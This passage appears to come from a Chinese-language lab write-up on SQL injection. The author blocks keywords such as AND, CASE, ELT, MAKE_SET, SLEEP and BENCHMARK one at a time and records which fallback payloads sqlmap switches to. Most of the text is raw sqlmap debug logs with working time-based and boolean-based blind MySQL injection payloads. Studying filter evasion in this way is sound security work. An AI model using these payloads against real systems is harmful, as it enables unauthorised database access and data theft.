Server Error)[23:09:20] [PAYLOAD] ELT(18=18,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(18=49,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(18=57,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(57=49,SLEEP(5))[23:09:25] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:25] [PAYLOAD] ELT(49=49,SLEEP(5))[23:09:30] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:30] [PAYLOAD] ELT(57 49,SLEEP(5))[23:09:31] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:31] [PAYLOAD] ELT(30=30,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(30=34,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(30=71,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(71=34,SLEEP(5))[23:09:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:36] [PAYLOAD] ELT(34=34,SLEEP(5))[23:09:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:41] [PAYLOAD] ELT(71 34,SLEEP(5))[23:09:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:41] [PAYLOAD] ELT(19=19,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(19=30,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(19=55,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(55=30,SLEEP(5))[23:09:46] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:46] [PAYLOAD] ELT(30=30,SLEEP(5))[23:09:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:51] [PAYLOAD] ELT(55 30,SLEEP(5))[23:09:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:51] [DEBUG] checking for parameter length constrainting mechanisms[23:09:51] [PAYLOAD] ELT(9111= 9111,SLEEP(5))[23:09:56] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:09:56] [DEBUG] checking for filtered characters[23:09:56] [PAYLOAD] ELT(9294>9293,SLEEP(5))[23:10:01] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:10:02] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1056 HTTP(s) requests:---Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL time-based blind - Parameter replace (ELT) Payload: id=ELT(1874=1874,SLEEP(5)) Vector: ELT([INFERENCE],SLEEP([SLEEPTIME]))---
假如禁掉的是AND,OR,RLIKE,CASE,SELECT,ELT字符串
MAKE_SET(bits,str1,str2,…)返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果
[23:13:17] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:13:17] [PAYLOAD] MAKE_SET(54=54,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(54=83,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(54=97,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(97=83,SLEEP(5))[23:13:22] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:22] [PAYLOAD] MAKE_SET(83=83,SLEEP(5))[23:13:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:27] [PAYLOAD] MAKE_SET(97 83,SLEEP(5))[23:13:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:28] [PAYLOAD] MAKE_SET(23=23,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(23=39,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(23=50,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(50=39,SLEEP(5))[23:13:33] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:33] [PAYLOAD] MAKE_SET(39=39,SLEEP(5))[23:13:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:38] [PAYLOAD] MAKE_SET(50 39,SLEEP(5))[23:13:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:38] [PAYLOAD] MAKE_SET(24=24,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(24=69,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(24=95,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(95=69,SLEEP(5))[23:13:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:43] [PAYLOAD] MAKE_SET(69=69,SLEEP(5))[23:13:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:48] [PAYLOAD] MAKE_SET(95 69,SLEEP(5))[23:13:48] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:48] [PAYLOAD] MAKE_SET(38=38,SLEEP(5))[23:13:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:53] [PAYLOAD] MAKE_SET(38=64,SLEEP(5))[23:13:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:53] [PAYLOAD] MAKE_SET(38=88,SLEEP(5))[23:13:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:54] [PAYLOAD] MAKE_SET(88=64,SLEEP(5))[23:13:54] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:54] [PAYLOAD] MAKE_SET(64=64,SLEEP(5))[23:13:59] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:59] [PAYLOAD] MAKE_SET(88 64,SLEEP(5))[23:13:59] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:13:59] [PAYLOAD] MAKE_SET(90=90,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(90=92,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(90=96,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(96=92,SLEEP(5))[23:14:04] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:04] [PAYLOAD] MAKE_SET(92=92,SLEEP(5))[23:14:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:09] [PAYLOAD] MAKE_SET(96 92,SLEEP(5))[23:14:09] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:09] [DEBUG] checking for parameter length constrainting mechanisms[23:14:09] [PAYLOAD] MAKE_SET(4328= 4328,SLEEP(5))[23:14:14] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:14:14] [DEBUG] checking for filtered characters[23:14:14] [PAYLOAD] MAKE_SET(2779>2778,SLEEP(5))[23:14:19] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:14:19] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1057 HTTP(s) requests:---Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL time-based blind - Parameter replace (MAKE_SET) Payload: id=MAKE_SET(3840=3840,SLEEP(5)) Vector: MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))---
假如禁掉的是AND,OR,RLIKE,CASE,SELECT,ELT,MAKE_SET字符串,就会报错
让我们回归到初始,禁止SLEEP字符串
BENCHMARK(count,expr) 函数重复count次执行表达式expr,它可以用于计时MySQL处理表达式有多快,结果值总是0。
[23:31:34] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:31:34] [PAYLOAD] 1 AND 8586=IF((62=62),BENCHMARK(5000000,MD5(0x49787364)),8586)[23:31:35] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:35] [PAYLOAD] 1 AND 3175=IF((62=86),BENCHMARK(5000000,MD5(0x616f6b74)),3175)[23:31:35] [PAYLOAD] 1 AND 1368=IF((62=98),BENCHMARK(5000000,MD5(0x66457065)),1368)[23:31:35] [PAYLOAD] 1 AND 2362=IF((98=86),BENCHMARK(5000000,MD5(0x4e6f5a6a)),2362)[23:31:35] [PAYLOAD] 1 AND 5234=IF((86=86),BENCHMARK(5000000,MD5(0x6d4e6d49)),5234)[23:31:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:36] [PAYLOAD] 1 AND 5792=IF((98 86),BENCHMARK(5000000,MD5(0x75735371)),5792)[23:31:36] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:36] [PAYLOAD] 1 AND 7985=IF((14=14),BENCHMARK(5000000,MD5(0x78417065)),7985)[23:31:37] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:37] [PAYLOAD] 1 AND 5476=IF((14=53),BENCHMARK(5000000,MD5(0x7267436f)),5476)[23:31:37] [PAYLOAD] 1 AND 2433=IF((14=76),BENCHMARK(5000000,MD5(0x52756b6f)),2433)[23:31:37] [PAYLOAD] 1 AND 2054=IF((76=53),BENCHMARK(5000000,MD5(0x6c4c6e66)),2054)[23:31:37] [PAYLOAD] 1 AND 6832=IF((53=53),BENCHMARK(5000000,MD5(0x6e507a50)),6832)[23:31:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:38] [PAYLOAD] 1 AND 4267=IF((76 53),BENCHMARK(5000000,MD5(0x6a766347)),4267)[23:31:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:38] [PAYLOAD] 1 AND 6289=IF((22=22),BENCHMARK(5000000,MD5(0x5258624a)),6289)[23:31:39] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:39] [PAYLOAD] 1 AND 7746=IF((22=62),BENCHMARK(5000000,MD5(0x4f597465)),7746)[23:31:39] [PAYLOAD] 1 AND 1055=IF((22=64),BENCHMARK(5000000,MD5(0x4f485952)),1055)[23:31:39] [PAYLOAD] 1 AND 7423=IF((64=62),BENCHMARK(5000000,MD5(0x6d64586e)),7423)[23:31:39] [PAYLOAD] 1 AND 1586=IF((62=62),BENCHMARK(5000000,MD5(0x71696243)),1586)[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:40] [PAYLOAD] 1 AND 9110=IF((64 62),BENCHMARK(5000000,MD5(0x4f7a5241)),9110)[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:40] [PAYLOAD] 1 AND 4776=IF((12=12),BENCHMARK(5000000,MD5(0x596c7457)),4776)[23:31:40] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:40] [PAYLOAD] 1 AND 8424=IF((12=22),BENCHMARK(5000000,MD5(0x457a486e)),8424)[23:31:40] [PAYLOAD] 1 AND 2962=IF((12=32),BENCHMARK(5000000,MD5(0x6d567677)),2962)[23:31:40] [PAYLOAD] 1 AND 7592=IF((32=22),BENCHMARK(5000000,MD5(0x6e4b6746)),7592)[23:31:41] [PAYLOAD] 1 AND 2975=IF((22=22),BENCHMARK(5000000,MD5(0x416a6f6a)),2975)[23:31:41] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:41] [PAYLOAD] 1 AND 2138=IF((32 22),BENCHMARK(5000000,MD5(0x7342766c)),2138)[23:31:42] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:42] [PAYLOAD] 1 AND 9458=IF((47=47),BENCHMARK(5000000,MD5(0x4458447a)),9458)[23:31:43] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:43] [PAYLOAD] 1 AND 8078=IF((47=48),BENCHMARK(5000000,MD5(0x4652454b)),8078)[23:31:43] [PAYLOAD] 1 AND 5384=IF((47=76),BENCHMARK(5000000,MD5(0x4f6d706e)),5384)[23:31:43] [PAYLOAD] 1 AND 9112=IF((76=48),BENCHMARK(5000000,MD5(0x764f626b)),9112)[23:31:43] [PAYLOAD] 1 AND 9116=IF((48=48),BENCHMARK(5000000,MD5(0x6873764a)),9116)[23:31:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:44] [PAYLOAD] 1 AND 2917=IF((76 48),BENCHMARK(5000000,MD5(0x557a6c62)),2917)[23:31:44] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:44] [DEBUG] checking for parameter length constrainting mechanisms[23:31:44] [PAYLOAD] 1 AND 2065=IF((9201= 9201),BENCHMARK(5000000,MD5(0x57724358)),2065)[23:31:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:31:45] [DEBUG] checking for filtered characters[23:31:45] [PAYLOAD] 1 AND 1617=IF((3411>3410),BENCHMARK(5000000,MD5(0x56496575)),1617)[23:31:45] [DEBUG] got HTTP error code: 500 (Internal Server Error)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:31:45] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 437 HTTP(s) requests:---Parameter: id (GET) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query) Payload: id=1 AND 4803=BENCHMARK(5000000,MD5(0x44487655)) Vector: AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])---
当我禁止SLEEP,BENCHMARK,就会失败,说明基于时间注入就是这两个函数之一控制的
基于布尔型注入(B)
默认情况,由AND进行判断结果是否相等
[23:38:26] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:38:26] [PAYLOAD] 1 AND 33=33[23:38:26] [PAYLOAD] 1 AND 33=96[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 96=76[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 76=76[23:38:26] [PAYLOAD] 1 AND 96 76[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 70=70[23:38:26] [PAYLOAD] 1 AND 70=96[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 96=81[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 81=81[23:38:26] [PAYLOAD] 1 AND 96 81[23:38:26] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:26] [PAYLOAD] 1 AND 33=33[23:38:26] [PAYLOAD] 1 AND 33=67[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 67=52[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 52=52[23:38:27] [PAYLOAD] 1 AND 67 52[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 16=16[23:38:27] [PAYLOAD] 1 AND 16=96[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 96=64[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 64=64[23:38:27] [PAYLOAD] 1 AND 96 64[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 38=38[23:38:27] [PAYLOAD] 1 AND 38=71[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 71=57[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [PAYLOAD] 1 AND 57=57[23:38:27] [PAYLOAD] 1 AND 71 57[23:38:27] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:38:27] [DEBUG] checking for parameter length constrainting mechanisms[23:38:27] [PAYLOAD] 1 AND 9527= 9527[23:38:27] [DEBUG] checking for filtered characters[23:38:27] [PAYLOAD] 1 AND (1709)=1709[23:38:27] [PAYLOAD] 1 AND 1710>1709GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:38:27] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 4833=4833 Vector: AND [INFERENCE]---
禁掉AND
就会使用case when then语句进行查询
[23:41:16] [INFO] checking if the injection point on GET parameter 'id' is a false positive[23:41:16] [PAYLOAD] (CASE WHEN (21=21) THEN 1 ELSE 5844*(SELECT 5844 FROM DUAL UNION SELECT 7325 FROM DUAL) END)[23:41:16] [PAYLOAD] (CASE WHEN (21=64) THEN 1 ELSE 9219*(SELECT 9219 FROM DUAL UNION SELECT 1744 FROM DUAL) END)[23:41:16] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (64=59) THEN 1 ELSE 8110*(SELECT 8110 FROM DUAL UNION SELECT 2379 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (59=59) THEN 1 ELSE 7130*(SELECT 7130 FROM DUAL UNION SELECT 4552 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (64 59) THEN 1 ELSE 3780*(SELECT 3780 FROM DUAL UNION SELECT 9899 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (60=60) THEN 1 ELSE 9062*(SELECT 9062 FROM DUAL UNION SELECT 4510 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (60=94) THEN 1 ELSE 5004*(SELECT 5004 FROM DUAL UNION SELECT 2949 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (94=82) THEN 1 ELSE 1182*(SELECT 1182 FROM DUAL UNION SELECT 7567 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (82=82) THEN 1 ELSE 8876*(SELECT 8876 FROM DUAL UNION SELECT 5433 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (94 82) THEN 1 ELSE 5776*(SELECT 5776 FROM DUAL UNION SELECT 9763 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (34=34) THEN 1 ELSE 4935*(SELECT 4935 FROM DUAL UNION SELECT 5480 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (34=82) THEN 1 ELSE 3865*(SELECT 3865 FROM DUAL UNION SELECT 1281 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (82=36) THEN 1 ELSE 8529*(SELECT 8529 FROM DUAL UNION SELECT 9064 FROM DUAL) END)[23:41:17] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:17] [PAYLOAD] (CASE WHEN (36=36) THEN 1 ELSE 3222*(SELECT 3222 FROM DUAL UNION SELECT 9853 FROM DUAL) END)[23:41:17] [PAYLOAD] (CASE WHEN (82 36) THEN 1 ELSE 5873*(SELECT 5873 FROM DUAL UNION SELECT 6193 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (14=14) THEN 1 ELSE 4089*(SELECT 4089 FROM DUAL UNION SELECT 2387 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (14=40) THEN 1 ELSE 8087*(SELECT 8087 FROM DUAL UNION SELECT 6170 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (40=37) THEN 1 ELSE 5070*(SELECT 5070 FROM DUAL UNION SELECT 7441 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (37=37) THEN 1 ELSE 2768*(SELECT 2768 FROM DUAL UNION SELECT 7753 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (40 37) THEN 1 ELSE 1946*(SELECT 1946 FROM DUAL UNION SELECT 9529 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (31=31) THEN 1 ELSE 5197*(SELECT 5197 FROM DUAL UNION SELECT 2014 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (31=75) THEN 1 ELSE 9154*(SELECT 9154 FROM DUAL UNION SELECT 4722 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (75=48) THEN 1 ELSE 9742*(SELECT 9742 FROM DUAL UNION SELECT 5455 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [PAYLOAD] (CASE WHEN (48=48) THEN 1 ELSE 7816*(SELECT 7816 FROM DUAL UNION SELECT 2905 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (75 48) THEN 1 ELSE 1589*(SELECT 1589 FROM DUAL UNION SELECT 7267 FROM DUAL) END)[23:41:18] [DEBUG] got HTTP error code: 500 (Internal Server Error)[23:41:18] [DEBUG] checking for parameter length constrainting mechanisms[23:41:18] [PAYLOAD] (CASE WHEN (9454= 9454) THEN 1 ELSE 6518*(SELECT 6518 FROM DUAL UNION SELECT 2474 FROM DUAL) END)[23:41:18] [DEBUG] checking for filtered characters[23:41:18] [PAYLOAD] (CASE WHEN ((1557)=1557) THEN 1 ELSE 9993*(SELECT 9993 FROM DUAL UNION SELECT 7747 FROM DUAL) END)[23:41:18] [PAYLOAD] (CASE WHEN (1558>1557) THEN 1 ELSE 8687*(SELECT 8687 FROM DUAL UNION SELECT 8396 FROM DUAL) END)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[23:41:18] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 655 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (DUAL) (original value) Payload: id=(CASE WHEN (4416=4416) THEN 1 ELSE 4416*(SELECT 4416 FROM DUAL UNION SELECT 9695 FROM DUAL) END) Vector: (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)---
禁掉AND,CASE
sqlmap就会用make_set函数
[09:08:50] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:08:50] [PAYLOAD] MAKE_SET(36=36,1)[09:08:50] [PAYLOAD] MAKE_SET(36=97,1)[09:08:50] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:50] [PAYLOAD] MAKE_SET(97=52,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(52=52,1)[09:08:51] [PAYLOAD] MAKE_SET(97 52,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(47=47,1)[09:08:51] [PAYLOAD] MAKE_SET(47=85,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(85=64,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(64=64,1)[09:08:51] [PAYLOAD] MAKE_SET(85 64,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(59=59,1)[09:08:51] [PAYLOAD] MAKE_SET(59=76,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(76=62,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(62=62,1)[09:08:51] [PAYLOAD] MAKE_SET(76 62,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(13=13,1)[09:08:51] [PAYLOAD] MAKE_SET(13=18,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(18=16,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(16=16,1)[09:08:51] [PAYLOAD] MAKE_SET(18 16,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(78=78,1)[09:08:51] [PAYLOAD] MAKE_SET(78=87,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(87=83,1)[09:08:51] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:51] [PAYLOAD] MAKE_SET(83=83,1)[09:08:52] [PAYLOAD] MAKE_SET(87 83,1)[09:08:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:08:52] [DEBUG] checking for parameter length constrainting mechanisms[09:08:52] [PAYLOAD] MAKE_SET(4909= 4909,1)[09:08:52] [DEBUG] checking for filtered characters[09:08:52] [PAYLOAD] MAKE_SET((2778)=2778,1)[09:08:52] [PAYLOAD] MAKE_SET(2779>2778,1)GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N[09:08:52] [DEBUG] used the default behaviour, running in batch modesqlmap identified the following injection point(s) with a total of 1542 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) Payload: id=MAKE_SET(3858=3858,1) Vector: MAKE_SET([INFERENCE],[ORIGVALUE])---
禁掉AND,CASE,MAKE_SET
使用ELT函数
[09:11:52] [INFO] checking if the injection point on GET parameter 'id' is a false positive[09:11:52] [PAYLOAD] ELT(47=47,1)[09:11:52] [PAYLOAD] ELT(47=95,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(95=75,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(75=75,1)[09:11:52] [PAYLOAD] ELT(95 75,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(73=73,1)[09:11:52] [PAYLOAD] ELT(73=94,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(94=86,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(86=86,1)[09:11:52] [PAYLOAD] ELT(94 86,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(45=45,1)[09:11:52] [PAYLOAD] ELT(45=95,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(95=92,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(92=92,1)[09:11:52] [PAYLOAD] ELT(95 92,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(15=15,1)[09:11:52] [PAYLOAD] ELT(15=91,1)[09:11:52] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:52] [PAYLOAD] ELT(91=84,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [PAYLOAD] ELT(84=84,1)[09:11:53] [PAYLOAD] ELT(91 84,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [PAYLOAD] ELT(17=17,1)[09:11:53] [PAYLOAD] ELT(17=74,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [PAYLOAD] ELT(74=28,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [PAYLOAD] ELT(28=28,1)[09:11:53] [PAYLOAD] ELT(74 28,1)[09:11:53] [DEBUG] got HTTP error code: 500 (Internal Server Error)[09:11:53] [DEBUG] checking for parameter length constrainting mechanisms[09:11:53] [PAYLOAD] ELT(5697= 5697,1)[09:11:53] [DEBUG] checking for filtered characters[09:11:53] [PAYLOAD] ELT((2220)=2220,1)[09:11:53] [PAYLOAD] ELT(2221>2220,1)GET parameter 